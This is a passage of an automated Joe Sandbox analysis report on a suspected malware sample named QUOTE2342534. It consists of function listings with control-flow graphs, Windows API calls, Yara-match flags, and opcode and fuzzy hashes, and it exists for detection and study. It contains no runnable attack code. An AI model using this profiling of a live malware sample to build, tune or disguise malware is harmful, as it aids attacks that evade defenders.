                                                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_16f0000_QUOTE2342534.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                                                                                • Opcode ID: 31621645318e66b44b8fd572ae59d8afbbd2d217c074c4f39523de17d0a02042
                                                                                                                                                                                                                                                • Instruction ID: 6337b76b7c43efd9f372869b640c8484cec07f3ad79985103abda25e8bdfebe6
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 31621645318e66b44b8fd572ae59d8afbbd2d217c074c4f39523de17d0a02042
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: EA90026120650003460571588418616800A97E0201F56C031E10145A0DC5258A916226
                                                                                                                                                                                                                                                Function 01762DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000004.00000002.2232503719.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_16f0000_QUOTE2342534.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                                                                                • Opcode ID: 340241332a4b44b69e3a1e6ccc4aa3503a2deb70cbfd23ec5af99b7da23d5624
                                                                                                                                                                                                                                                • Instruction ID: cea4abfb9cc1eb233845dc36da57caeb39240fba3e9cd19a742e2b05b132e912
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 340241332a4b44b69e3a1e6ccc4aa3503a2deb70cbfd23ec5af99b7da23d5624
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C890023120550413D61171588508707400997D0241F96C432A0424568DD6568B52A222
                                                                                                                                                                                                                                                Function 01762C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000004.00000002.2232503719.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_16f0000_QUOTE2342534.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                                                                                • Opcode ID: befa5f6f34f9cee2dfcb4ddb782e3837d240503cae1d937ae01bcb4aef58764c
                                                                                                                                                                                                                                                • Instruction ID: aed9606ee08badf7a23248ad7d5174f471a0b4191f1a393b34f8bfbd2925981e
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: befa5f6f34f9cee2dfcb4ddb782e3837d240503cae1d937ae01bcb4aef58764c
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: AC90023120558802D6107158C40874A400597D0301F5AC431A4424668DC6958A917222
                                                                                                                                                                                                                                                Function 017635C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000004.00000002.2232503719.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_16f0000_QUOTE2342534.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                                                                                • Opcode ID: 1806fd3bcd3bb71a097d62487ca7a5ce529e2411d6bb6ce6e707553ec6f249d6
                                                                                                                                                                                                                                                • Instruction ID: b4217b1437d65659a256b99a2095463e0f44cce8bd75ab5093f7e387ccb1db6f
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1806fd3bcd3bb71a097d62487ca7a5ce529e2411d6bb6ce6e707553ec6f249d6
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: EB90023160960402D60071588518706500597D0201F66C431A0424578DC7958B5166A3
                                                                                                                                                                                                                                                Function 00413F0E Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 116threadwindowCOMMON
                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                control_flow_graph 0 413f0e-413f16 1 413f95 0->1 2 413f18-413f2d 0->2 3 413f97-413f9a 1->3 2->3 4 413f2f-413f34 2->4 5 413fa0-413fcf call 42e643 call 42f053 4->5 6 413f36-413f3b 4->6 22 413fd2-41400a call 4176e3 call 4047e3 call 424da3 5->22 7 413ee6-413eec 6->7 8 413f3c-413f43 6->8 12 413e80-413e97 7->12 13 413eee-413f08 7->13 8->8 10 413f45-413f48 8->10 17 413ee5-413ee7 12->17 18 413e99-413eda 12->18 14 413ee4 13->14 15 413f0a-413f0c 13->15 14->17 19 413f4d-413f54 15->19 28 413ee9-413eec 17->28 29 413e6d-413e77 17->29 18->19 25 413edc-413ee1 18->25 19->22 23 413f56-413f5d 19->23 35 41402a-414030 22->35 36 41400c-41401b PostThreadMessageW 22->36 23->22 25->14 28->12 28->13 36->35 37 41401d-414027 36->37 37->35
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • PostThreadMessageW.USER32(4-4-J4,00000111,00000000,00000000), ref: 00414017
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000004.00000002.2231861338.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_400000_QUOTE2342534.jbxd
                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: MessagePostThread
                                                                                                                                                                                                                                                • String ID: 4-4-J4$4-4-J4
                                                                                                                                                                                                                                                • API String ID: 1836367815-3753321779
                                                                                                                                                                                                                                                • Opcode ID: 37b7d48b4ddf4d6c96e59390c7111f254f5b84e47db6d3a54920264bcd7aceae
                                                                                                                                                                                                                                                • Instruction ID: 55dae615ef78242bf991c2a8a60c41167ffb937f57d0004e81445608f1b41ceb
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 37b7d48b4ddf4d6c96e59390c7111f254f5b84e47db6d3a54920264bcd7aceae
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7531DE71D042093ADB129DE59C41AEF7F2CDF82798F04412AF94097281E32D8E4B87A1
                                                                                                                                                                                                                                                Function 00413ED2 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 95COMMON
                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                control_flow_graph 39 413ed2-413eda 40 413f4d-413f54 39->40 41 413edc-413ee1 39->41 42 413fd2-41400a call 4176e3 call 4047e3 call 424da3 40->42 43 413f56-413f5d 40->43 44 413ee4 41->44 59 41402a-414030 42->59 60 41400c-41401b PostThreadMessageW 42->60 43->42 46 413ee5-413ee7 44->46 51 413ee9-413eec 46->51 52 413e6d-413e77 46->52 53 413e80-413e97 51->53 54 413eee-413f08 51->54 53->46 57 413e99-413e9f 53->57 54->44 56 413f0a-413f0c 54->56 56->40 57->39 60->59 61 41401d-414027 60->61 61->59
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000004.00000002.2231861338.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_400000_QUOTE2342534.jbxd
                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: 4-4-J4$4-4-J4
                                                                                                                                                                                                                                                • API String ID: 0-3753321779
                                                                                                                                                                                                                                                • Opcode ID: 2e896a41b676ef4e30eb95eba6dbd06fb908acfe39bc32c604f82cb6c4e14558
                                                                                                                                                                                                                                                • Instruction ID: 6e624780ca105cc56abdb6f2ab32564844c42ad3b9a11ec48eb4921c7c05193f
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2e896a41b676ef4e30eb95eba6dbd06fb908acfe39bc32c604f82cb6c4e14558
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F521D2719012587B9712DAA6DC818EF7FACFFC138171480AAE540DB141E72DCD8B47D4
                                                                                                                                                                                                                                                Function 00413F9B Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 65threadwindowCOMMON
                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • PostThreadMessageW.USER32(4-4-J4,00000111,00000000,00000000), ref: 00414017
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000004.00000002.2231861338.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_400000_QUOTE2342534.jbxd
                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: MessagePostThread
                                                                                                                                                                                                                                                • String ID: 4-4-J4$4-4-J4
                                                                                                                                                                                                                                                • API String ID: 1836367815-3753321779
                                                                                                                                                                                                                                                • Opcode ID: ffd557800e414f954c484f370eacd57de618c8d2aa5ce60cc1583afe5c15e64e
                                                                                                                                                                                                                                                • Instruction ID: df3e715f38e70cb85223758300ef890a164112d1031199cf701353b49171308d
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ffd557800e414f954c484f370eacd57de618c8d2aa5ce60cc1583afe5c15e64e
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E811C2B1D0121C7ADB11AB92DC81DEF7BBCEF85798F048169FA0067141D6785E068BA2
                                                                                                                                                                                                                                                Function 00413F62 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 64threadwindowCOMMON
                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                control_flow_graph 81 413f62-413f6c 82 413fed 81->82 83 413f6e-413f76 81->83 84 413ff1-41400a 82->84 83->84 85 413f78-413f9a 83->85 87 41402a-414030 84->87 88 41400c-41401b PostThreadMessageW 84->88 88->87 89 41401d-414027 88->89 89->87
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • PostThreadMessageW.USER32(4-4-J4,00000111,00000000,00000000), ref: 00414017
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000004.00000002.2231861338.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_400000_QUOTE2342534.jbxd
                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: MessagePostThread
                                                                                                                                                                                                                                                • String ID: 4-4-J4$4-4-J4
                                                                                                                                                                                                                                                • API String ID: 1836367815-3753321779
                                                                                                                                                                                                                                                • Opcode ID: 7940e7917a46a24fa532bae1aba0d6da2248eebe6bfcc7216a5af4a0fdda3ecc
                                                                                                                                                                                                                                                • Instruction ID: d3ee978ba1df89b4be96e20182993629dfdb436125b644da9b59b432c2a2a97b
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7940e7917a46a24fa532bae1aba0d6da2248eebe6bfcc7216a5af4a0fdda3ecc
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: FA11AB36A0410EAED701CE89DCC28EDFB7CEE15304B1441ABE654AB202E3354E4A8BD0
                                                                                                                                                                                                                                                Function 00413FA3 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 60threadwindowCOMMON
                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                control_flow_graph 91 413fa3-41400a call 42e643 call 42f053 call 4176e3 call 4047e3 call 424da3 103 41402a-414030 91->103 104 41400c-41401b PostThreadMessageW 91->104 104->103 105 41401d-414027 104->105 105->103
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • PostThreadMessageW.USER32(4-4-J4,00000111,00000000,00000000), ref: 00414017
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000004.00000002.2231861338.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_400000_QUOTE2342534.jbxd
                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: MessagePostThread
                                                                                                                                                                                                                                                • String ID: 4-4-J4$4-4-J4
                                                                                                                                                                                                                                                • API String ID: 1836367815-3753321779
                                                                                                                                                                                                                                                • Opcode ID: 81aa26a83b58a022274caf07475b231d46f0b228aeaf2bb60dc7d4a9fd85ac71
                                                                                                                                                                                                                                                • Instruction ID: 867f21decbd16667ff7de2bacb24861e5022b0197581cec3475637117d18b71a
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 81aa26a83b58a022274caf07475b231d46f0b228aeaf2bb60dc7d4a9fd85ac71
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1F01E1B1D0121C7ADB10AAE29C81CEF7B7CDF81698F048029FA0067140D6685F068BA1
                                                                                                                                                                                                                                                Function 0042C863 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 29memoryCOMMON
                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                control_flow_graph 107 42c863-42c8a4 call 404873 call 42d733 RtlFreeHeap
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • RtlFreeHeap.NTDLL(00000000,00000004,00000000,?,00000007,00000000,00000004,00000000,?,000000F4), ref: 0042C89F
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000004.00000002.2231861338.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_400000_QUOTE2342534.jbxd
                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: FreeHeap
                                                                                                                                                                                                                                                • String ID: 4dA
                                                                                                                                                                                                                                                • API String ID: 3298025750-3697888251
                                                                                                                                                                                                                                                • Opcode ID: d45dd4416ad7f3a90ec090a28f93a4118255ba9b713096ae3f43c4bfbed4663a
                                                                                                                                                                                                                                                • Instruction ID: 95c6e1cf8f50921438346b2c019ee274ecc2e822df50c29a14df8959a2e7ed7d
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d45dd4416ad7f3a90ec090a28f93a4118255ba9b713096ae3f43c4bfbed4663a
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C6E06D76604204BBD610EE99DC41FDB73ACEFC4710F00441AF908A7241DA74B911C7F8
                                                                                                                                                                                                                                                Function 004177A4 Relevance: 1.5, APIs: 1, Instructions: 35COMMON
                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                control_flow_graph 438 4177a4-4177a5 439 4177a6-4177a7 438->439 439->439 440 4177a9 439->440 441 4177ab-4177c1 440->441 442 41773d-417741 440->442 443 417743-417757 LdrLoadDll 442->443 444 41775a-41775d 442->444 443->444
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000004.00000002.2231861338.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_400000_QUOTE2342534.jbxd
                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 5c5a578267e16a54a1868f729b603a14c62fad820ccf99605df71dbdbc894f9f
                                                                                                                                                                                                                                                • Instruction ID: 7461589b22b7392c87fc1f18ad3185ab8d77c60dc1931c89600c01bfc46526c0
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5c5a578267e16a54a1868f729b603a14c62fad820ccf99605df71dbdbc894f9f
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7EF05934A0418D9ED711DBF0CC06F8AFB34EF82310F0443DDD8988B1E1D22099828B80
                                                                                                                                                                                                                                                Function 0042C813 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                control_flow_graph 445 42c813-42c857 call 404873 call 42d733 RtlAllocateHeap
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • RtlAllocateHeap.NTDLL(?,0041E4B1,?,?,00000000,?,0041E4B1,?,?,?), ref: 0042C852
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000004.00000002.2231861338.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_400000_QUOTE2342534.jbxd
                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: AllocateHeap
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 1279760036-0
                                                                                                                                                                                                                                                • Opcode ID: c0c97e144f40e868a9476a0e994ce902a3f535a152f54a84e659e6420cbf2a46
                                                                                                                                                                                                                                                • Instruction ID: 83fbc1a649b13180b5dbe8e154e75011721def11b2ca418cc7d3df61b031a839
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c0c97e144f40e868a9476a0e994ce902a3f535a152f54a84e659e6420cbf2a46
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 80E06D76204254BBD610EE99DC41EDF77ACEFC5710F00441AF908A7241C770B91187B8
                                                                                                                                                                                                                                                Function 0042C8B3 Relevance: 1.5, APIs: 1, Instructions: 25COMMON
                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                control_flow_graph 455 42c8b3-42c8ef call 404873 call 42d733 ExitProcess
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • ExitProcess.KERNEL32(?,00000000,00000000,?,53E499F8,?,?,53E499F8), ref: 0042C8EA
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000004.00000002.2231861338.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_400000_QUOTE2342534.jbxd
                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: ExitProcess
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 621844428-0
                                                                                                                                                                                                                                                • Opcode ID: a9a4a4c62b58ef0ba244859742880b5ac06f6282b498342e0cc2cdbd9f96dd99
                                                                                                                                                                                                                                                • Instruction ID: 0334e32139044cfb67a958e5bab765f99ba1e1fbbb8e6fe4313f94219555c775
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a9a4a4c62b58ef0ba244859742880b5ac06f6282b498342e0cc2cdbd9f96dd99
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E7E046362442147BD620AAAADC02F9BB76CDBC5724F40842AFA08A7242C774B905C7E4
                                                                                                                                                                                                                                                Function 01762C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000004.00000002.2232503719.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_16f0000_QUOTE2342534.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                                                                                • Opcode ID: f047e2743a81a55474f904c50166ff3456fee598ec76de90ea3facf75c6a067b
                                                                                                                                                                                                                                                • Instruction ID: 5fb6751b7ade4547c1a463c2ba43b53395e6f5b85dd39afc6bceeb6f3afdd017
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f047e2743a81a55474f904c50166ff3456fee598ec76de90ea3facf75c6a067b
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 86B09B719055C5C9DF52F764460C717B90477D0701F16C071D6030651F4738C1D1E276

                                                                                                                                                                                                                                                Non-executed Functions

                                                                                                                                                                                                                                                Function 017A2349 Relevance: 26.1, Strings: 20, Instructions: 1117COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000004.00000002.2232503719.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_16f0000_QUOTE2342534.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                                                                                                                                                                                                                                • API String ID: 0-2160512332
                                                                                                                                                                                                                                                • Opcode ID: 8fe6c26c4ef9606fa69702e7f462ca7b353f04abcab65f2c125a845cd26a72b4
                                                                                                                                                                                                                                                • Instruction ID: b05875a2a1c3661bfa0dce776f2dfb8ca35786420657c314be24f075a91f212e
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8fe6c26c4ef9606fa69702e7f462ca7b353f04abcab65f2c125a845cd26a72b4
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4A926C71608342AFE721DF28C884B6BF7E8BB84754F444A2DFA94D7252D770E944CB92
                                                                                                                                                                                                                                                Function 01758620 Relevance: 17.7, Strings: 14, Instructions: 223COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                • corrupted critical section, xrefs: 017954C2
                                                                                                                                                                                                                                                • Thread is in a state in which it cannot own a critical section, xrefs: 01795543
                                                                                                                                                                                                                                                • double initialized or corrupted critical section, xrefs: 01795508
                                                                                                                                                                                                                                                • Thread identifier, xrefs: 0179553A
                                                                                                                                                                                                                                                • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 0179540A, 01795496, 01795519
                                                                                                                                                                                                                                                • 8, xrefs: 017952E3
                                                                                                                                                                                                                                                • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 017954CE
                                                                                                                                                                                                                                                • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 017954E2
                                                                                                                                                                                                                                                • Critical section address., xrefs: 01795502
                                                                                                                                                                                                                                                • Critical section debug info address, xrefs: 0179541F, 0179552E
                                                                                                                                                                                                                                                • Invalid debug info address of this critical section, xrefs: 017954B6
                                                                                                                                                                                                                                                • Address of the debug info found in the active list., xrefs: 017954AE, 017954FA
                                                                                                                                                                                                                                                • Critical section address, xrefs: 01795425, 017954BC, 01795534
                                                                                                                                                                                                                                                • undeleted critical section in freed memory, xrefs: 0179542B
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000004.00000002.2232503719.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_16f0000_QUOTE2342534.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                                                                                                                                                                                                                                • API String ID: 0-2368682639
                                                                                                                                                                                                                                                • Opcode ID: 82bf5b950202e646c90747a88940045a49bfb3b9c8e36785cd192feaba66c56c
                                                                                                                                                                                                                                                • Instruction ID: 059fa58a12d8bf5706f9680aeb64cb80ed48328f530afd5896dd40283c1ae5c8
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 82bf5b950202e646c90747a88940045a49bfb3b9c8e36785cd192feaba66c56c
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 00819DB1A00358EFEF21CF99C855BAEFBF5AB48704F20415AF904B7291D3B1A944CB61
                                                                                                                                                                                                                                                Function 017529F9 Relevance: 14.2, Strings: 11, Instructions: 411COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                • SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 01792506
                                                                                                                                                                                                                                                • SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 01792602
                                                                                                                                                                                                                                                • SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 017925EB
                                                                                                                                                                                                                                                • @, xrefs: 0179259B
                                                                                                                                                                                                                                                • SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 01792409
                                                                                                                                                                                                                                                • SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 01792624
                                                                                                                                                                                                                                                • SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 017922E4
                                                                                                                                                                                                                                                • SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 017924C0
                                                                                                                                                                                                                                                • SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 01792498
                                                                                                                                                                                                                                                • RtlpResolveAssemblyStorageMapEntry, xrefs: 0179261F
                                                                                                                                                                                                                                                • SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 01792412
                                                                                                                                                                                                                                                Memory Dump Source
